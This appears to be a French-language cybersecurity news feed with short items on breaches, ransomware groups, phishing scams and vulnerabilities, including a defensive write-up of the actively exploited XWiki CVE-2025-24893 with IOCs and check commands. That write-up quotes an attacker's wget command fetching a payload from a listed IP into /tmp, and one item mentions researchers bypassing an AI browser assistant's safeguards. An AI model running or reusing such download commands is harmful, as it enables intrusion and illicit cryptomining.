🔎 Cyberveille

France Travail a été victime d'une cyberattaque lundi, a appris mercredi 29 octobre franceinfo auprès de l'établissement public. "Selon nos premières investigations, des données ont en effet été extraites", explique France Travail, sans être "en mesure de confirmer le volume des demandeurs d’emploi concernés, ni de confirmer la nature des données" piratées.

Actualités de la cybersécurité francophone🇨🇭​ CyberVeille piloté par @decio #switzerland #france #canada #threats #informatique

👥​ Suivre le groupe @cyberveille

:rss:​ https://infosec.pub/feeds/c/cyberveille.xml?sort=Active

🌐​ https://cyberveille.ch/

⚠️ Vulnérabilité XWiki CVE-2025-24893 activement exploitée

Une faille critique dans XWiki (CVE-2025-24893) est exploitée activement sur internet. Elle permet une injection de template non authentifiée pouvant conduire à l’exécution de code à distance (RCE). Des attaquants s’en servent actuellement pour installer un mineur de cryptomonnaie.

🧩 Ce qui se passe

Selon VulnCheck , leurs “canaries” ont observé une chaîne d’exploitation en deux étapes :

Première étape : L’attaquant dépose un petit script (x640) dans /tmp/. Exemple :

wget http://193.32.208.24:8080/7I2l42wlAe/x640 -O /tmp/11909

Deuxième étape (20 min plus tard) : Il exécute ce script, qui télécharge et lance deux autres (x521 et x522). Ceux-ci installent puis démarrent un mineur de cryptomonnaie appelé tcrond, configuré pour se connecter à c3pool.org.

Le malware nettoie ensuite la machine (historique, processus concurrents, etc.) pour monopoliser les ressources CPU.

🚨 Détails techniques & indicateurs (IOCs)

IPs observées :

• 123.25.249.88 (Vietnam)

• 193.32.208.24 (héberge les payloads)

Fichiers et scripts malveillants :

• /tmp/11909

• x640, x521, x522

• binaire : tcrond (mineur UPX-packed)

Hashes connus :

tcrond (UPX): 0b907eee9a85d39f8f0d7c503cc1f84a71c4de10 tcrond (unpacked): 90d274c7600fbdca5fe035250d0baff20889ec2b x521: de082aeb01d41dd81cfb79bc5bfa33453b0022ed x522: 2abd6f68a24b0a5df5809276016e6b85c77e5f7f x640: 5abc337dbc04fee7206956dad1e0b6d43921a868

🔍 Vérifications rapides

Sur un serveur XWiki, exécutez :

find /tmp /var/tmp -type f -mtime -2 -ls
ps aux | egrep 'tcrond|xmrig|kinsing|kdevtmpfsi|nanopool'
ss -tunp | egrep '193\.32\.208\.24|123\.25\.249\.88'

⚙️ Si vous trouvez /tmp/11909 ou un binaire tcrond, la machine est probablement compromise. Isolez-la, collectez les journaux, puis réinstallez à partir d’une source propre.

🛡️ Mesures recommandées

Mettre à jour XWiki dès qu’un correctif officiel est disponible.

Restreindre l’accès à /bin/get/Main/SolrSearch via un proxy ou un WAF.

Bloquer les IPs observées (pare-feu, IDS).

Surveiller les logs pour des requêtes contenant {{groovy}} ou wget ... /tmp/.

Sources:

👇

XWiki CVE-2025-24893 Exploited in the Wild

👇

https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j

Les chercheurs de Kaspersky ont détecté en début d'année une campagne de cyberespionnage contre des organisations russes, basée sur l'exploitation d'une vulnérabilité 0-day dans Google Chrome. Après avoir remonté la chaîne d'attaque, ils ont relié le malware utilisé au logiciel espion “Dante”, développé et commercialisé par la société italienne Memento Labs (ex-HackingTeam).

Pour échapper à la détection des outils de sécurité, le gang de ransomware Qilin a été observé en train d'utiliser une nouvelle technique : l'utilisation de Windows Subsystem for Linux (WSL) pour exécuter son module de chiffrement des données créé pour Linux.

Le ransomware Qilin, apparu pour la première fois en août 2022 et initialement nommé Agenda, est actuellement l’une des menaces les plus redoutables. D’après les recherches de Trend Micro et Cisco Talos, ce gang de ransomware Qilin serait à l'origine de plus de 700 victimes réparties dans 62 pays au cours de l’année 2025. Depuis cet été, on parle d'une moyenne de 40 nouvelles victimes publiées chaque mois.

Watch on Video channel logo Les affiliés de Qilin ont d'ailleurs pour habitude de détourner l'utilisation d'outils légitimes pour s'introduire dans les réseaux des entreprises. On peut notamment donner les exemples suivants :

• Outils de prise de contrôle à distance comme AnyDesk, ScreenConnect, Splashtop.
• Applications utilisées pour l’exfiltration de données : Cyberduck, WinRAR.
• Des utilitaires intégrés à Windows comme Paint ou Bloc-notes pour visualiser les documents avant de les exfiltrer.

• Microsoft prêche contre BinaryFormatter depuis 5 ans mais l'utilise en secret dans WSUS : 500 000 serveurs exposés à une faille critique exploitée massivement
• Un attaquant non authentifié peut prendre le contrôle total d'un serveur Windows avec privilèges SYSTEM en envoyant simplement un cookie malveillant
• Microsoft déprécie discrètement WSUS un an avant que la faille n'éclate : coïncidence ou savaient-ils que leur code zombie allait exploser ?

Des escrocs publient de fausses annonces de location d'appartements ou de maisons, qui ne sont en réalité pas à louer. Lorsqu’une personne est intéressée, le prétendu propriétaire explique qu’il se trouve à l’étranger, rendant impossible toute visite du bien. Il est alors demandé à la victime de verser un acompte ou une caution via la plateforme Airbnb, «par mesure de sécurité». Un lien est ensuite envoyé, dirigeant vers un site qui ressemble comme deux gouttes d'eau à celui d'Airbnb. Il s’agit en réalité d’un faux site et d'une tentative de phishing. Une fausse facture est ensuite générée, demandant un paiement sur un compte privé à l’étranger.

Votre entreprise stocke ses données chez Amazon Web Services. Vos employés utilisent Microsoft 365. Vos développeurs codent avec des outils américains. Vos serveurs tournent sur des processeurs taïwanais. Vos services d’intelligence artificielle s’appuient sur ChatGPT ou Claude.

Posez-vous cette question : que se passerait-il si ces technologies devenaient inaccessibles demain ?

Alors que l’Europe accélère sa transition énergétique, un nouveau risque de dépendance apparaît. La majorité des équipements solaires installés sur le continent, notamment les onduleurs, provient de Chine. Une situation qui soulève des inquiétudes croissantes en matière de souveraineté industrielle et de cybersécurité.

Après le gaz russe, l'Europe risque-t-elle d'être de nouveau trop dépendante d'une puissance étrangère pour ses besoins énergétiques ? Selon le média Politico, la réponse est oui. Mais il ne s'agit pas de gaz, ni de carburant. Le problème se trouve directement au niveau de la production d'électricité, et plus spécifiquement le solaire.

Dans un rapport publié le 23 octobre 2025, la société de services réseaux Infoblox met en lumière la face cachée du navigateur Universe Browser. L’outil, téléchargé des millions de fois, promettait à ses utilisateurs un respect de leur vie privée et la possibilité de contourner la censure dans les pays où les jeux d’argent en ligne sont interdits. Entre escroqueries à échelle industrielle, opérations de fraude générant des dizaines de milliards de dollars par an et trafics d’êtres humains, les réseaux cybercriminels d’Asie du Sud-Est ne cessent d’inquiéter les autorités internationales.

Le 29 octobre 2025, Peter Williams, ancien directeur général de la société de cybersécurité Trenchant, devra répondre aux accusations de la justice fédérale américaine. Ce ressortissant australien est officiellement inculpé pour avoir volé et vendu plusieurs secrets industriels appartenant à ses clients à un acheteur russe, en échange d’environ 1,3 million de dollars. Quels secrets ont été vendus et qui a pu mettre la main dessus ? Voilà deux des nombreux points d’interrogation qui entourent l’affaire Peter Williams aux États-Unis.

Des adresses mail et des mots de passe s'étaient retrouvés sur une plateforme en ligne, librement accessible, après un vol massif de données personnelles, au printemps dernier. La fuite avait été identifiée dès le mois de mai, mais sans que les comptes Gmail ne soient évoqués jusqu'ici.

L’aéroport de Dublin a été l’une des victimes d’une vaste cyberattaque. Des millions de données de passagers ont été compromises au cours de l’offensive. Le groupe de pirates russes Everest revendique l’intrusion et menace de publier les informations volées sur le dark web.

Dans un article de blog publié le 24 octobre 2025, des chercheurs de la société de cybersécurité NeuralTrust ont révélé une méthode permettant à un acteur malveillant de contourner les mécanismes de sécurité de l’assistant IA intégré au nouveau navigateur ChatGPT Atlas. Depuis le lancement du nouveau navigateur ChatGPT Atlas par OpenAI, le 21 octobre 2025, chacun s’y intéresse à sa manière : le grand public explore ses nouvelles fonctionnalités, tandis que les chercheurs en cybersécurité, eux, cherchent surtout à tester ses limites et à repérer les failles avant que des cybercriminels ne s’en chargent.

Alors que la mobilité électrique explose en Europe, les cybercriminels ciblent désormais les bornes de recharge. À base de QR codes piégés ou d'attaques à distance, la menace s'intensifie pour les conducteurs.

Berne, 27.10.2025 — En cas de cyberincident, la mise en réseau complète des systèmes numériques pourrait affecter un grand nombre d’organisations. C’est pourquoi une approche coordonnée de tous les acteurs concernés, qu’ils soient issus du monde économique, des cantons ou de la Confédération, est essentielle. L’Office fédéral de la cybersécurité (OFCS) a donc élaboré un concept illustrant l’organisation mise en place par la Confédération pour garantir la gestion coordonnée des cyberincidents.

Dans sa quête d'autonomie technologique, la Chine vient de franchir une étape décisive. Le pays a officialisé une nouvelle norme de firmware, UBIOS, destinée à remplacer l'omniprésent UEFI et à bâtir un écosystème informatique entièrement souverain.

• L’Office fédéral de la cybersécurité a analysé deux logiciels open source, TYPO3 et QGIS, dans le cadre d’un projet pilote mené avec le NTC.
• Huit failles ont été détectées dans TYPO3, dont une critique, tandis que QGIS présentait six vulnérabilités, dont deux de gravité élevée.
• Toutes les failles majeures ont été corrigées par la communauté en moins de 90 jours, améliorant la sécurité globale de ces outils.
• L’OFCS envisage d’institutionnaliser ces contrôles pour renforcer durablement la cyberrésilience et la souveraineté numérique de la Suisse.

Une étude révèle que près de 20 000 mots de passe d’employés du secteur public français sont exposés sur le dark web. En exploitant ces données d’identification compromises, des pirates pourraient parvenir à mener des cyberattaques contre les institutions publiques françaises.

Sur le dark web, on trouve énormément de mots de passe appartenant à des employés de l’État français. C’est ce que révèle une étude réalisée par les chercheurs de NordPass à l’aide de NordStellar, la plateforme de surveillance du dark web développée par Nord Security (qui édite aussi NordVPN).

Selon les derniers rapports, elles ont bondi de 180 % au Portugal, tandis que l’Allemagne, le Royaume-Uni et l’Italie figurent parmi les pays les plus ciblés. Un constat alarmant qui confirme que le Vieux Continent est devenu l’un des terrains de jeu favori des hackers. Les cyberattaques ont augmenté de manière exponentielle au Portugal au cours des six premiers mois de 2025, avec 14 incidents de ce type enregistrés, selon le rapport semestriel de Thales. Il s'agit d'une augmentation de 180 % par rapport au second semestre de l'année dernière.

Le groupe de pirates informatiques AKIRA est la plus grande menace dans le pays, avec trois attaques enregistrées, suivi par Nightspire, Nitrogen et Warlock, avec deux attaques chacun.

Ces groupes de ransomware ont intensifié la fréquence de leurs attaques, qui deviennent de plus en plus sophistiquées. Bien que l'on continue d'observer l'utilisation du modèle RaaS ( ransomware-as-a-service ), dans lequel le logiciel malveillant est fourni à des tiers en échange d'un pourcentage des bénéfices réalisés, certains de ces acteurs se concentrent de plus en plus sur le vol et l'extorsion de données, en excluant le composant de chiffrement de l'infrastructure attaquée, une tendance qui démontre un changement dans les schémas des ransomwares.

Huit règles pour la cyberguerre Par ailleurs, les hackers ont un statut compliqué: doit-on considérer celles et ceux qui participent à des efforts de guerre comme des combattants à part entière? Et quelles sont les limites de leurs activités? Le CICR s'est penché sur le sujet et a notamment édicté début 2024 huit règles d'engagement dans le cadre des conflits armés, sur le modèle des règles du droit international en matière de guerres conventionnelles.

La production auto britannique a chuté de plus d'un quart sur un an en septembre au Royaume-Uni, plombée par une cyberattaque qui a mis à l'arrêt pendant plus d'un mois Jaguar Land Rover (JLR), plus gros employeur du secteur au Royaume-Uni.

Révélée le 2 septembre, la cyberattaque avait contraint JLR à fermer ses systèmes et sa production, qui n'a pas pu redémarrer avant début octobre, mettant la pression sur le constructeur et nombre de ses fournisseurs.

La production britannique de voitures a chuté de 27,1% en septembre, selon les chiffres publiés vendredi par l'association sectorielle (SMMT), qui pointe notamment dans un communiqué "l'arrêt de la production chez le plus grand employeur automobile britannique".

"Le paiement d'une rançon ne garantit pas que les auteurs de la menace ne divulguent pas les données de la victime ou ne frappent pas de nouveau, ce qui modifie fondamentalement le calcul du rapport risque-bénéfice pour les organisations ciblées”, note CrowdStrike. (…) Les facteurs économiques favorisent les attaquants qui peuvent percevoir des paiements tout en conservant les données volées pour les exploiter ultérieurement, tenter d'autres extorsions ou les vendre à d'autres groupes criminels.”

L’avenir de la sécurité réseau ne réside plus dans la détection, mais dans la stabilisation entropique. Il faudra concevoir des algorithmes capables de maintenir la cohérence du chaos, de limiter la dérive sans chercher à la supprimer.

La survie des entreprises passe désormais par leur capacité à réagir efficacement lors d'un incident.

Les entreprises européennes font face à une réalité alarmante : les cyberattaques ont établi de nouveaux records en termes de variété et de nombre d'incidents selon le rapport ENISA Threat Landscape 2024. Cette tendance observée en 2024 transforme radicalement l'approche que doivent adopter les organisations en matière de gestion de crise pour 2025. Au-delà de la simple protection technique, c'est désormais leur capacité à réagir efficacement lors d'un incident qui détermine leur survie.